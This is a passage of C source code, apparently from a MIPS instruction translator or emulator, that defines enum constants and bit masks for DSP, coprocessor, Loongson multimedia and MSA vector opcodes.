    OPC_DINSV = (0x00 << 6) | OPC_DINSV_DSP,
};

#define MASK_DPAQ_W_QH(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6)))
enum {
    /* MIPS DSP Multiply Sub-class insns */
    OPC_DMADD = (0x19 << 6) | OPC_DPAQ_W_QH_DSP,
    OPC_DMADDU = (0x1D << 6) | OPC_DPAQ_W_QH_DSP,
    OPC_DMSUB = (0x1B << 6) | OPC_DPAQ_W_QH_DSP,
    OPC_DMSUBU = (0x1F << 6) | OPC_DPAQ_W_QH_DSP,
    OPC_DPA_W_QH = (0x00 << 6) | OPC_DPAQ_W_QH_DSP,
    OPC_DPAQ_S_W_QH = (0x04 << 6) | OPC_DPAQ_W_QH_DSP,
    OPC_DPAQ_SA_L_PW = (0x0C << 6) | OPC_DPAQ_W_QH_DSP,
    OPC_DPAU_H_OBL = (0x03 << 6) | OPC_DPAQ_W_QH_DSP,
    OPC_DPAU_H_OBR = (0x07 << 6) | OPC_DPAQ_W_QH_DSP,
    OPC_DPS_W_QH = (0x01 << 6) | OPC_DPAQ_W_QH_DSP,
    OPC_DPSQ_S_W_QH = (0x05 << 6) | OPC_DPAQ_W_QH_DSP,
    OPC_DPSQ_SA_L_PW = (0x0D << 6) | OPC_DPAQ_W_QH_DSP,
    OPC_DPSU_H_OBL = (0x0B << 6) | OPC_DPAQ_W_QH_DSP,
    OPC_DPSU_H_OBR = (0x0F << 6) | OPC_DPAQ_W_QH_DSP,
    OPC_MAQ_S_L_PWL = (0x1C << 6) | OPC_DPAQ_W_QH_DSP,
    OPC_MAQ_S_L_PWR = (0x1E << 6) | OPC_DPAQ_W_QH_DSP,
    OPC_MAQ_S_W_QHLL = (0x14 << 6) | OPC_DPAQ_W_QH_DSP,
    OPC_MAQ_SA_W_QHLL = (0x10 << 6) | OPC_DPAQ_W_QH_DSP,
    OPC_MAQ_S_W_QHLR = (0x15 << 6) | OPC_DPAQ_W_QH_DSP,
    OPC_MAQ_SA_W_QHLR = (0x11 << 6) | OPC_DPAQ_W_QH_DSP,
    OPC_MAQ_S_W_QHRL = (0x16 << 6) | OPC_DPAQ_W_QH_DSP,
    OPC_MAQ_SA_W_QHRL = (0x12 << 6) | OPC_DPAQ_W_QH_DSP,
    OPC_MAQ_S_W_QHRR = (0x17 << 6) | OPC_DPAQ_W_QH_DSP,
    OPC_MAQ_SA_W_QHRR = (0x13 << 6) | OPC_DPAQ_W_QH_DSP,
    OPC_MULSAQ_S_L_PW = (0x0E << 6) | OPC_DPAQ_W_QH_DSP,
    OPC_MULSAQ_S_W_QH = (0x06 << 6) | OPC_DPAQ_W_QH_DSP,
};

#define MASK_SHLL_OB(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6)))
enum {
    /* MIPS DSP GPR-Based Shift Sub-class */
    OPC_SHLL_PW = (0x10 << 6) | OPC_SHLL_OB_DSP,
    OPC_SHLL_S_PW = (0x14 << 6) | OPC_SHLL_OB_DSP,
    OPC_SHLLV_OB = (0x02 << 6) | OPC_SHLL_OB_DSP,
    OPC_SHLLV_PW = (0x12 << 6) | OPC_SHLL_OB_DSP,
    OPC_SHLLV_S_PW = (0x16 << 6) | OPC_SHLL_OB_DSP,
    OPC_SHLLV_QH = (0x0A << 6) | OPC_SHLL_OB_DSP,
    OPC_SHLLV_S_QH = (0x0E << 6) | OPC_SHLL_OB_DSP,
    OPC_SHRA_PW = (0x11 << 6) | OPC_SHLL_OB_DSP,
    OPC_SHRA_R_PW = (0x15 << 6) | OPC_SHLL_OB_DSP,
    OPC_SHRAV_OB = (0x06 << 6) | OPC_SHLL_OB_DSP,
    OPC_SHRAV_R_OB = (0x07 << 6) | OPC_SHLL_OB_DSP,
    OPC_SHRAV_PW = (0x13 << 6) | OPC_SHLL_OB_DSP,
    OPC_SHRAV_R_PW = (0x17 << 6) | OPC_SHLL_OB_DSP,
    OPC_SHRAV_QH = (0x0B << 6) | OPC_SHLL_OB_DSP,
    OPC_SHRAV_R_QH = (0x0F << 6) | OPC_SHLL_OB_DSP,
    OPC_SHRLV_OB = (0x03 << 6) | OPC_SHLL_OB_DSP,
    OPC_SHRLV_QH = (0x1B << 6) | OPC_SHLL_OB_DSP,
    OPC_SHLL_OB = (0x00 << 6) | OPC_SHLL_OB_DSP,
    OPC_SHLL_QH = (0x08 << 6) | OPC_SHLL_OB_DSP,
    OPC_SHLL_S_QH = (0x0C << 6) | OPC_SHLL_OB_DSP,
    OPC_SHRA_OB = (0x04 << 6) | OPC_SHLL_OB_DSP,
    OPC_SHRA_R_OB = (0x05 << 6) | OPC_SHLL_OB_DSP,
    OPC_SHRA_QH = (0x09 << 6) | OPC_SHLL_OB_DSP,
    OPC_SHRA_R_QH = (0x0D << 6) | OPC_SHLL_OB_DSP,
    OPC_SHRL_OB = (0x01 << 6) | OPC_SHLL_OB_DSP,
    OPC_SHRL_QH = (0x19 << 6) | OPC_SHLL_OB_DSP,
};

/* Coprocessor 0 (rs field) */
/* Selects the major opcode plus the 5-bit rs field in bits 25..21. */
#define MASK_CP0(op) MASK_OP_MAJOR(op) | (op & (0x1F << 21))

enum {
    OPC_MFC0 = (0x00 << 21) | OPC_CP0,
    OPC_DMFC0 = (0x01 << 21) | OPC_CP0,
    OPC_MTC0 = (0x04 << 21) | OPC_CP0,
    OPC_DMTC0 = (0x05 << 21) | OPC_CP0,
    OPC_MFTR = (0x08 << 21) | OPC_CP0,
    OPC_RDPGPR = (0x0A << 21) | OPC_CP0,
    OPC_MFMC0 = (0x0B << 21) | OPC_CP0,
    OPC_MTTR = (0x0C << 21) | OPC_CP0,
    OPC_WRPGPR = (0x0E << 21) | OPC_CP0,
    OPC_C0 = (0x10 << 21) | OPC_CP0,
    OPC_C0_FIRST = (0x10 << 21) | OPC_CP0,
    OPC_C0_LAST = (0x1F << 21) | OPC_CP0,
};

/* MFMC0 opcodes */
#define MASK_MFMC0(op) MASK_CP0(op) | (op & 0xFFFF)

enum {
    OPC_DMT = 0x01 | (0 << 5) | (0x0F << 6) | (0x01 << 11) | OPC_MFMC0,
    OPC_EMT = 0x01 | (1 << 5) | (0x0F << 6) | (0x01 << 11) | OPC_MFMC0,
    OPC_DVPE = 0x01 | (0 << 5) | OPC_MFMC0,
    OPC_EVPE = 0x01 | (1 << 5) | OPC_MFMC0,
    OPC_DI = (0 << 5) | (0x0C << 11) | OPC_MFMC0,
    OPC_EI = (1 << 5) | (0x0C << 11) | OPC_MFMC0,
};

/* Coprocessor 0 (with rs == C0) */
#define MASK_C0(op) MASK_CP0(op) | (op & 0x3F)

enum {
    OPC_TLBR = 0x01 | OPC_C0,
    OPC_TLBWI = 0x02 | OPC_C0,
    OPC_TLBINV = 0x03 | OPC_C0,
    OPC_TLBINVF = 0x04 | OPC_C0,
    OPC_TLBWR = 0x06 | OPC_C0,
    OPC_TLBP = 0x08 | OPC_C0,
    OPC_RFE = 0x10 | OPC_C0,
    OPC_ERET = 0x18 | OPC_C0,
    OPC_DERET = 0x1F | OPC_C0,
    OPC_WAIT = 0x20 | OPC_C0,
};

/* Coprocessor 1 (rs field) */
#define MASK_CP1(op) MASK_OP_MAJOR(op) | (op & (0x1F << 21))

/* Values for the fmt field in FP instructions */
enum {
    /* 0 - 15 are reserved */
    FMT_S = 16,          /* single fp */
    FMT_D = 17,          /* double fp */
    FMT_E = 18,          /* extended fp */
    FMT_Q = 19,          /* quad fp */
    FMT_W = 20,          /* 32-bit fixed */
    FMT_L = 21,          /* 64-bit fixed */
    FMT_PS = 22,         /* paired single fp */
    /* 23 - 31 are reserved */
};

enum {
    OPC_MFC1 = (0x00 << 21) | OPC_CP1,
    OPC_DMFC1 = (0x01 << 21) | OPC_CP1,
    OPC_CFC1 = (0x02 << 21) | OPC_CP1,
    OPC_MFHC1 = (0x03 << 21) | OPC_CP1,
    OPC_MTC1 = (0x04 << 21) | OPC_CP1,
    OPC_DMTC1 = (0x05 << 21) | OPC_CP1,
    OPC_CTC1 = (0x06 << 21) | OPC_CP1,
    OPC_MTHC1 = (0x07 << 21) | OPC_CP1,
    OPC_BC1 = (0x08 << 21) | OPC_CP1, /* bc */
    OPC_BC1ANY2 = (0x09 << 21) | OPC_CP1,
    OPC_BC1ANY4 = (0x0A << 21) | OPC_CP1,
    OPC_BZ_V = (0x0B << 21) | OPC_CP1,
    OPC_BNZ_V = (0x0F << 21) | OPC_CP1,
    OPC_S_FMT = (FMT_S << 21) | OPC_CP1,
    OPC_D_FMT = (FMT_D << 21) | OPC_CP1,
    OPC_E_FMT = (FMT_E << 21) | OPC_CP1,
    OPC_Q_FMT = (FMT_Q << 21) | OPC_CP1,
    OPC_W_FMT = (FMT_W << 21) | OPC_CP1,
    OPC_L_FMT = (FMT_L << 21) | OPC_CP1,
    OPC_PS_FMT = (FMT_PS << 21) | OPC_CP1,
    OPC_BC1EQZ = (0x09 << 21) | OPC_CP1,
    OPC_BC1NEZ = (0x0D << 21) | OPC_CP1,
    OPC_BZ_B = (0x18 << 21) | OPC_CP1,
    OPC_BZ_H = (0x19 << 21) | OPC_CP1,
    OPC_BZ_W = (0x1A << 21) | OPC_CP1,
    OPC_BZ_D = (0x1B << 21) | OPC_CP1,
    OPC_BNZ_B = (0x1C << 21) | OPC_CP1,
    OPC_BNZ_H = (0x1D << 21) | OPC_CP1,
    OPC_BNZ_W = (0x1E << 21) | OPC_CP1,
    OPC_BNZ_D = (0x1F << 21) | OPC_CP1,
};

#define MASK_CP1_FUNC(op) MASK_CP1(op) | (op & 0x3F)
#define MASK_BC1(op) MASK_CP1(op) | (op & (0x3 << 16))

enum {
    OPC_BC1F = (0x00 << 16) | OPC_BC1,
    OPC_BC1T = (0x01 << 16) | OPC_BC1,
    OPC_BC1FL = (0x02 << 16) | OPC_BC1,
    OPC_BC1TL = (0x03 << 16) | OPC_BC1,
};

enum {
    OPC_BC1FANY2 = (0x00 << 16) | OPC_BC1ANY2,
    OPC_BC1TANY2 = (0x01 << 16) | OPC_BC1ANY2,
};

enum {
    OPC_BC1FANY4 = (0x00 << 16) | OPC_BC1ANY4,
    OPC_BC1TANY4 = (0x01 << 16) | OPC_BC1ANY4,
};

#define MASK_CP2(op) MASK_OP_MAJOR(op) | (op & (0x1F << 21))

enum {
    OPC_MFC2 = (0x00 << 21) | OPC_CP2,
    OPC_DMFC2 = (0x01 << 21) | OPC_CP2,
    OPC_CFC2 = (0x02 << 21) | OPC_CP2,
    OPC_MFHC2 = (0x03 << 21) | OPC_CP2,
    OPC_MTC2 = (0x04 << 21) | OPC_CP2,
    OPC_DMTC2 = (0x05 << 21) | OPC_CP2,
    OPC_CTC2 = (0x06 << 21) | OPC_CP2,
    OPC_MTHC2 = (0x07 << 21) | OPC_CP2,
    OPC_BC2 = (0x08 << 21) | OPC_CP2,
    OPC_BC2EQZ = (0x09 << 21) | OPC_CP2,
    OPC_BC2NEZ = (0x0D << 21) | OPC_CP2,
};

/*
 * LMI opcodes overlay the CP2 space: rs (bits 25..21) selects the row
 * and the low 5 bits select the column.
 */
#define MASK_LMI(op) (MASK_OP_MAJOR(op) | (op & (0x1F << 21)) | (op & 0x1F))

enum {
    OPC_PADDSH = (24 << 21) | (0x00) | OPC_CP2,
    OPC_PADDUSH = (25 << 21) | (0x00) | OPC_CP2,
    OPC_PADDH = (26 << 21) | (0x00) | OPC_CP2,
    OPC_PADDW = (27 << 21) | (0x00) | OPC_CP2,
    OPC_PADDSB = (28 << 21) | (0x00) | OPC_CP2,
    OPC_PADDUSB = (29 << 21) | (0x00) | OPC_CP2,
    OPC_PADDB = (30 << 21) | (0x00) | OPC_CP2,
    OPC_PADDD = (31 << 21) | (0x00) | OPC_CP2,

    OPC_PSUBSH = (24 << 21) | (0x01) | OPC_CP2,
    OPC_PSUBUSH = (25 << 21) | (0x01) | OPC_CP2,
    OPC_PSUBH = (26 << 21) | (0x01) | OPC_CP2,
    OPC_PSUBW = (27 << 21) | (0x01) | OPC_CP2,
    OPC_PSUBSB = (28 << 21) | (0x01) | OPC_CP2,
    OPC_PSUBUSB = (29 << 21) | (0x01) | OPC_CP2,
    OPC_PSUBB = (30 << 21) | (0x01) | OPC_CP2,
    OPC_PSUBD = (31 << 21) | (0x01) | OPC_CP2,

    OPC_PSHUFH = (24 << 21) | (0x02) | OPC_CP2,
    OPC_PACKSSWH = (25 << 21) | (0x02) | OPC_CP2,
    OPC_PACKSSHB = (26 << 21) | (0x02) | OPC_CP2,
    OPC_PACKUSHB = (27 << 21) | (0x02) | OPC_CP2,
    OPC_XOR_CP2 = (28 << 21) | (0x02) | OPC_CP2,
    OPC_NOR_CP2 = (29 << 21) | (0x02) | OPC_CP2,
    OPC_AND_CP2 = (30 << 21) | (0x02) | OPC_CP2,
    OPC_PANDN = (31 << 21) | (0x02) | OPC_CP2,

    OPC_PUNPCKLHW = (24 << 21) | (0x03) | OPC_CP2,
    OPC_PUNPCKHHW = (25 << 21) | (0x03) | OPC_CP2,
    OPC_PUNPCKLBH = (26 << 21) | (0x03) | OPC_CP2,
    OPC_PUNPCKHBH = (27 << 21) | (0x03) | OPC_CP2,
    OPC_PINSRH_0 = (28 << 21) | (0x03) | OPC_CP2,
    OPC_PINSRH_1 = (29 << 21) | (0x03) | OPC_CP2,
    OPC_PINSRH_2 = (30 << 21) | (0x03) | OPC_CP2,
    OPC_PINSRH_3 = (31 << 21) | (0x03) | OPC_CP2,

    OPC_PAVGH = (24 << 21) | (0x08) | OPC_CP2,
    OPC_PAVGB = (25 << 21) | (0x08) | OPC_CP2,
    OPC_PMAXSH = (26 << 21) | (0x08) | OPC_CP2,
    OPC_PMINSH = (27 << 21) | (0x08) | OPC_CP2,
    OPC_PMAXUB = (28 << 21) | (0x08) | OPC_CP2,
    OPC_PMINUB = (29 << 21) | (0x08) | OPC_CP2,

    OPC_PCMPEQW = (24 << 21) | (0x09) | OPC_CP2,
    OPC_PCMPGTW = (25 << 21) | (0x09) | OPC_CP2,
    OPC_PCMPEQH = (26 << 21) | (0x09) | OPC_CP2,
    OPC_PCMPGTH = (27 << 21) | (0x09) | OPC_CP2,
    OPC_PCMPEQB = (28 << 21) | (0x09) | OPC_CP2,
    OPC_PCMPGTB = (29 << 21) | (0x09) | OPC_CP2,

    OPC_PSLLW = (24 << 21) | (0x0A) | OPC_CP2,
    OPC_PSLLH = (25 << 21) | (0x0A) | OPC_CP2,
    OPC_PMULLH = (26 << 21) | (0x0A) | OPC_CP2,
    OPC_PMULHH = (27 << 21) | (0x0A) | OPC_CP2,
    OPC_PMULUW = (28 << 21) | (0x0A) | OPC_CP2,
    OPC_PMULHUH = (29 << 21) | (0x0A) | OPC_CP2,

    OPC_PSRLW = (24 << 21) | (0x0B) | OPC_CP2,
    OPC_PSRLH = (25 << 21) | (0x0B) | OPC_CP2,
    OPC_PSRAW = (26 << 21) | (0x0B) | OPC_CP2,
    OPC_PSRAH = (27 << 21) | (0x0B) | OPC_CP2,
    OPC_PUNPCKLWD = (28 << 21) | (0x0B) | OPC_CP2,
    OPC_PUNPCKHWD = (29 << 21) | (0x0B) | OPC_CP2,

    OPC_ADDU_CP2 = (24 << 21) | (0x0C) | OPC_CP2,
    OPC_OR_CP2 = (25 << 21) | (0x0C) | OPC_CP2,
    OPC_ADD_CP2 = (26 << 21) | (0x0C) | OPC_CP2,
    OPC_DADD_CP2 = (27 << 21) | (0x0C) | OPC_CP2,
    OPC_SEQU_CP2 = (28 << 21) | (0x0C) | OPC_CP2,
    OPC_SEQ_CP2 = (29 << 21) | (0x0C) | OPC_CP2,

    OPC_SUBU_CP2 = (24 << 21) | (0x0D) | OPC_CP2,
    OPC_PASUBUB = (25 << 21) | (0x0D) | OPC_CP2,
    OPC_SUB_CP2 = (26 << 21) | (0x0D) | OPC_CP2,
    OPC_DSUB_CP2 = (27 << 21) | (0x0D) | OPC_CP2,
    OPC_SLTU_CP2 = (28 << 21) | (0x0D) | OPC_CP2,
    OPC_SLT_CP2 = (29 << 21) | (0x0D) | OPC_CP2,

    OPC_SLL_CP2 = (24 << 21) | (0x0E) | OPC_CP2,
    OPC_DSLL_CP2 = (25 << 21) | (0x0E) | OPC_CP2,
    OPC_PEXTRH = (26 << 21) | (0x0E) | OPC_CP2,
    OPC_PMADDHW = (27 << 21) | (0x0E) | OPC_CP2,
    OPC_SLEU_CP2 = (28 << 21) | (0x0E) | OPC_CP2,
    OPC_SLE_CP2 = (29 << 21) | (0x0E) | OPC_CP2,

    OPC_SRL_CP2 = (24 << 21) | (0x0F) | OPC_CP2,
    OPC_DSRL_CP2 = (25 << 21) | (0x0F) | OPC_CP2,
    OPC_SRA_CP2 = (26 << 21) | (0x0F) | OPC_CP2,
    OPC_DSRA_CP2 = (27 << 21) | (0x0F) | OPC_CP2,
    OPC_BIADD = (28 << 21) | (0x0F) | OPC_CP2,
    OPC_PMOVMSKB = (29 << 21) | (0x0F) | OPC_CP2,
};


#define MASK_CP3(op) MASK_OP_MAJOR(op) | (op & 0x3F)

enum {
    OPC_LWXC1 = 0x00 | OPC_CP3,
    OPC_LDXC1 = 0x01 | OPC_CP3,
    OPC_LUXC1 = 0x05 | OPC_CP3,
    OPC_SWXC1 = 0x08 | OPC_CP3,
    OPC_SDXC1 = 0x09 | OPC_CP3,
    OPC_SUXC1 = 0x0D | OPC_CP3,
    OPC_PREFX = 0x0F | OPC_CP3,
    OPC_ALNV_PS = 0x1E | OPC_CP3,
    OPC_MADD_S = 0x20 | OPC_CP3,
    OPC_MADD_D = 0x21 | OPC_CP3,
    OPC_MADD_PS = 0x26 | OPC_CP3,
    OPC_MSUB_S = 0x28 | OPC_CP3,
    OPC_MSUB_D = 0x29 | OPC_CP3,
    OPC_MSUB_PS = 0x2E | OPC_CP3,
    OPC_NMADD_S = 0x30 | OPC_CP3,
    OPC_NMADD_D = 0x31 | OPC_CP3,
    OPC_NMADD_PS= 0x36 | OPC_CP3,
    OPC_NMSUB_S = 0x38 | OPC_CP3,
    OPC_NMSUB_D = 0x39 | OPC_CP3,
    OPC_NMSUB_PS= 0x3E | OPC_CP3,
};

/* MSA Opcodes */
/* MSA minor opcode lives in the low 6 bits of the instruction word. */
#define MASK_MSA_MINOR(op) (MASK_OP_MAJOR(op) | (op & 0x3F))
enum {
    OPC_MSA_I8_00 = 0x00 | OPC_MSA,
    OPC_MSA_I8_01 = 0x01 | OPC_MSA,
    OPC_MSA_I8_02 = 0x02 | OPC_MSA,
    OPC_MSA_I5_06 = 0x06 | OPC_MSA,
    OPC_MSA_I5_07 = 0x07 | OPC_MSA,
    OPC_MSA_BIT_09 = 0x09 | OPC_MSA,
    OPC_MSA_BIT_0A = 0x0A | OPC_MSA,
    OPC_MSA_3R_0D = 0x0D | OPC_MSA,
    OPC_MSA_3R_0E = 0x0E | OPC_MSA,
    OPC_MSA_3R_0F = 0x0F | OPC_MSA,
    OPC_MSA_3R_10 = 0x10 | OPC_MSA,
    OPC_MSA_3R_11 = 0x11 | OPC_MSA,
    OPC_MSA_3R_12 = 0x12 | OPC_MSA,
    OPC_MSA_3R_13 = 0x13 | OPC_MSA,
    OPC_MSA_3R_14 = 0x14 | OPC_MSA,
    OPC_MSA_3R_15 = 0x15 | OPC_MSA,
    OPC_MSA_ELM = 0x19 | OPC_MSA,
    OPC_MSA_3RF_1A = 0x1A | OPC_MSA,
    OPC_MSA_3RF_1B = 0x1B | OPC_MSA,
    OPC_MSA_3RF_1C = 0x1C | OPC_MSA,
    OPC_MSA_VEC = 0x1E | OPC_MSA,

    /* MI10 instruction */
    OPC_LD_B = (0x20) | OPC_MSA,
    OPC_LD_H = (0x21) | OPC_MSA,
    OPC_LD_W = (0x22) | OPC_MSA,
    OPC_LD_D = (0x23) | OPC_MSA,
    OPC_ST_B = (0x24) | OPC_MSA,
    OPC_ST_H = (0x25) | OPC_MSA,
    OPC_ST_W = (0x26) | OPC_MSA,
    OPC_ST_D = (0x27) | OPC_MSA,
};

enum {
    /* I5 instruction df(bits 22..21) = _b, _h, _w, _d */
    OPC_ADDVI_df = (0x0 << 23) | OPC_MSA_I5_06,
    OPC_CEQI_df = (0x0 << 23) | OPC_MSA_I5_07,
    OPC_SUBVI_df = (0x1 << 23) | OPC_MSA_I5_06,
    OPC_MAXI_S_df = (0x2 << 23) | OPC_MSA_I5_06,
    OPC_CLTI_S_df = (0x2 << 23) | OPC_MSA_I5_07,
    OPC_MAXI_U_df = (0x3 << 23) | OPC_MSA_I5_06,
    OPC_CLTI_U_df = (0x3 << 23) | OPC_MSA_I5_07,
    OPC_MINI_S_df = (0x4 << 23) | OPC_MSA_I5_06,
    OPC_CLEI_S_df = (0x4 << 23) | OPC_MSA_I5_07,
    OPC_MINI_U_df = (0x5 << 23) | OPC_MSA_I5_06,
    OPC_CLEI_U_df = (0x5 << 23) | OPC_MSA_I5_07,
    OPC_LDI_df = (0x6 << 23) | OPC_MSA_I5_07,

    /* I8 instruction */
    OPC_ANDI_B = (0x0 << 24) | OPC_MSA_I8_00,
    OPC_BMNZI_B = (0x0 << 24) | OPC_MSA_I8_01,
    OPC_SHF_B = (0x0 << 24) | OPC_MSA_I8_02,
    OPC_ORI_B = (0x1 << 24) | OPC_MSA_I8_00,
    OPC_BMZI_B = (0x1 << 24) | OPC_MSA_I8_01,
    OPC_SHF_H = (0x1 << 24) | OPC_MSA_I8_02,
    OPC_NORI_B = (0x2 << 24) | OPC_MSA_I8_00,
    OPC_BSELI_B = (0x2 << 24) | OPC_MSA_I8_01,
    OPC_SHF_W = (0x2 << 24) | OPC_MSA_I8_02,
    OPC_XORI_B = (0x3 << 24) | OPC_MSA_I8_00,

    /* VEC/2R/2RF instruction */
    OPC_AND_V = (0x00 << 21) | OPC_MSA_VEC,
    OPC_OR_V = (0x01 << 21) | OPC_MSA_VEC,
    OPC_NOR_V = (0x02 << 21) | OPC_MSA_VEC,
    OPC_XOR_V = (0x03 << 21) | OPC_MSA_VEC,
    OPC_BMNZ_V = (0x04 << 21) | OPC_MSA_VEC,
    OPC_BMZ_V = (0x05 << 21) | OPC_MSA_VEC,
    OPC_BSEL_V = (0x06 << 21) | OPC_MSA_VEC,

    OPC_MSA_2R = (0x18 << 21) | OPC_MSA_VEC,
    OPC_MSA_2RF = (0x19 << 21) | OPC_MSA_VEC,

    /* 2R instruction df(bits 17..16) = _b, _h, _w, _d */
    OPC_FILL_df = (0x00 << 18) | OPC_MSA_2R,
    OPC_PCNT_df = (0x01 << 18) | OPC_MSA_2R,
    OPC_NLOC_df = (0x02 << 18) | OPC_MSA_2R,
    OPC_NLZC_df = (0x03 << 18) | OPC_MSA_2R,

    /* 2RF instruction df(bit 16) = _w, _d */
    OPC_FCLASS_df = (0x00 << 17) | OPC_MSA_2RF,
    OPC_FTRUNC_S_df = (0x01 << 17) | OPC_MSA_2RF,
    OPC_FTRUNC_U_df = (0x02 << 17) | OPC_MSA_2RF,
    OPC_FSQRT_df = (0x03 << 17) | OPC_MSA_2RF,
    OPC_FRSQRT_df = (0x04 << 17) | OPC_MSA_2RF,
    OPC_FRCP_df = (0x05 << 17) | OPC_MSA_2RF,
    OPC_FRINT_df = (0x06 << 17) | OPC_MSA_2RF,
    OPC_FLOG2_df = (0x07 << 17) | OPC_MSA_2RF,
    OPC_FEXUPL_df = (0x08 << 17) | OPC_MSA_2RF,
    OPC_FEXUPR_df = (0x09 << 17) | OPC_MSA_2RF,
    OPC_FFQL_df = (0x0A << 17) | OPC_MSA_2RF,
    OPC_FFQR_df = (0x0B << 17) | OPC_MSA_2RF,
    OPC_FTINT_S_df = (0x0C << 17) | OPC_MSA_2RF,
    OPC_FTINT_U_df = (0x0D << 17) | OPC_MSA_2RF,
    OPC_FFINT_S_df = (0x0E << 17) | OPC_MSA_2RF,
    OPC_FFINT_U_df = (0x0F << 17) | OPC_MSA_2RF,

    /* 3R instruction df(bits 22..21) = _b, _h, _w, d */
    OPC_SLL_df = (0x0 << 23) | OPC_MSA_3R_0D,
    OPC_ADDV_df = (0x0 << 23) | OPC_MSA_3R_0E,
    OPC_CEQ_df = (0x0 << 23) | OPC_MSA_3R_0F,
    OPC_ADD_A_df = (0x0 << 23) | OPC_MSA_3R_10,
    OPC_SUBS_S_df = (0x0 << 23) | OPC_MSA_3R_11,
    OPC_MULV_df = (0x0 << 23) | OPC_MSA_3R_12,
    OPC_DOTP_S_df = (0x0 << 23) | OPC_MSA_3R_13,
    OPC_SLD_df = (0x0 << 23) | OPC_MSA_3R_14,
    OPC_VSHF_df = (0x0 << 23) | OPC_MSA_3R_15,
    OPC_SRA_df = (0x1 << 23) | OPC_MSA_3R_0D,
    OPC_SUBV_df = (0x1 << 23) | OPC_MSA_3R_0E,
    OPC_ADDS_A_df = (0x1 << 23) | OPC_MSA_3R_10,
    OPC_SUBS_U_df = (0x1 << 23) | OPC_MSA_3R_11,
    OPC_MADDV_df = (0x1 << 23) | OPC_MSA_3R_12,
    OPC_DOTP_U_df = (0x1 << 23) | OPC_MSA_3R_13,
    OPC_SPLAT_df = (0x1 << 23) | OPC_MSA_3R_14,
    OPC_SRAR_df = (0x1 << 23) | OPC_MSA_3R_15,
    OPC_SRL_df = (0x2 << 23) | OPC_MSA_3R_0D,
    OPC_MAX_S_df = (0x2 << 23) | OPC_MSA_3R_0E,
    OPC_CLT_S_df = (0x2 << 23) | OPC_MSA_3R_0F,
    OPC_ADDS_S_df = (0x2 << 23) | OPC_MSA_3R_10,
    OPC_SUBSUS_U_df = (0x2 << 23) | OPC_MSA_3R_11,
    OPC_MSUBV_df = (0x2 << 23) | OPC_MSA_3R_12,
    OPC_DPADD_S_df = (0x2 << 23) | OPC_MSA_3R_13,
    OPC_PCKEV_df = (0x2 << 23) | OPC_MSA_3R_14,
    OPC_SRLR_df = (0x2 << 23) | OPC_MSA_3R_15,
    OPC_BCLR_df = (0x3 << 23) | OPC_MSA_3R_0D,
    OPC_MAX_U_df = (0x3 << 23) | OPC_MSA_3R_0E,
    OPC_CLT_U_df = (0x3 << 23) | OPC_MSA_3R_0F,
    OPC_ADDS_U_df = (0x3 << 23) | OPC_MSA_3R_10,
    OPC_SUBSUU_S_df = (0x3 << 23) | OPC_MSA_3R_11,
    OPC_DPADD_U_df = (0x3 << 23) | OPC_MSA_3R_13,
    OPC_PCKOD_df = (0x3 << 23) | OPC_MSA_3R_14,
    OPC_BSET_df = (0x4 << 23) | OPC_MSA_3R_0D,
    OPC_MIN_S_df = (0x4 << 23) | OPC_MSA_3R_0E,
    OPC_CLE_S_df = (0x4 << 23) | OPC_MSA_3R_0F,
    OPC_AVE_S_df = (0x4 << 23) | OPC_MSA_3R_10,
    OPC_ASUB_S_df = (0x4 << 23) | OPC_MSA_3R_11,
    OPC_DIV_S_df = (0x4 << 23) | OPC_MSA_3R_12,
    OPC_DPSUB_S_df = (0x4 << 23) | OPC_MSA_3R_13,
    OPC_ILVL_df = (0x4 << 23) | OPC_MSA_3R_14,
    OPC_HADD_S_df = (0x4 << 23) | OPC_MSA_3R_15,
    OPC_BNEG_df = (0x5 << 23) | OPC_MSA_3R_0D,
    OPC_MIN_U_df = (0x5 << 23) | OPC_MSA_3R_0E,
    OPC_CLE_U_df = (0x5 << 23) | OPC_MSA_3R_0F,
    OPC_AVE_U_df = (0x5 << 23) | OPC_MSA_3R_10,
    OPC_ASUB_U_df = (0x5 << 23) | OPC_MSA_3R_11,
    OPC_DIV_U_df = (0x5 << 23) | OPC_MSA_3R_12,
    OPC_DPSUB_U_df = (0x5 << 23) | OPC_MSA_3R_13,
    OPC_ILVR_df = (0x5 << 23) | OPC_MSA_3R_14,
    OPC_HADD_U_df = (0x5 << 23) | OPC_MSA_3R_15,
    OPC_BINSL_df = (0x6 << 23) | OPC_MSA_3R_0D,
    OPC_MAX_A_df = (0x6 << 23) | OPC_MSA_3R_0E,
    OPC_AVER_S_df = (0x6 << 23) | OPC_MSA_3R_10,
    OPC_MOD_S_df = (0x6 << 23) | OPC_MSA_3R_12,
    OPC_ILVEV_df = (0x6 << 23) | OPC_MSA_3R_14,
    OPC_HSUB_S_df = (0x6 << 23) | OPC_MSA_3R_15,
    OPC_BINSR_df = (0x7 << 23) | OPC_MSA_3R_0D,
    OPC_MIN_A_df = (0x7 << 23) | OPC_MSA_3R_0E,
    OPC_AVER_U_df = (0x7 << 23) | OPC_MSA_3R_10,
    OPC_MOD_U_df = (0x7 << 23) | OPC_MSA_3R_12,
    OPC_ILVOD_df = (0x7 << 23) | OPC_MSA_3R_14,
    OPC_HSUB_U_df = (0x7 << 23) | OPC_MSA_3R_15,

    /* ELM instructions df(bits 21..16) = _b, _h, _w, _d */
    OPC_SLDI_df = (0x0 << 22) | (0x00 << 16) | OPC_MSA_ELM,
    OPC_CTCMSA = (0x0 << 22) | (0x3E << 16) | OPC_MSA_ELM,
    OPC_SPLATI_df = (0x1 << 22) | (0x00 << 16) | OPC_MSA_ELM,
    OPC_CFCMSA = (0x1 << 22) | (0x3E << 16) | OPC_MSA_ELM,
    OPC_COPY_S_df = (0x2 << 22) | (0x00 << 16) | OPC_MSA_ELM,
    OPC_MOVE_V = (0x2 << 22) | (0x3E << 16) | OPC_MSA_ELM,
    OPC_COPY_U_df = (0x3 << 22) | (0x00 << 16) | OPC_MSA_ELM,
    OPC_INSERT_df = (0x4 << 22) | (0x00 << 16) | OPC_MSA_ELM,
    OPC_INSVE_df = (0x5 << 22) | (0x00 << 16) | OPC_MSA_ELM,

    /* 3RF instruction _df(bit 21) = _w, _d */
    OPC_FCAF_df = (0x0 << 22) | OPC_MSA_3RF_1A,
    OPC_FADD_df = (0x0 << 22) | OPC_MSA_3RF_1B,
    OPC_FCUN_df = (0x1 << 22) | OPC_MSA_3RF_1A,
    OPC_FSUB_df = (0x1 << 22) | OPC_MSA_3RF_1B,
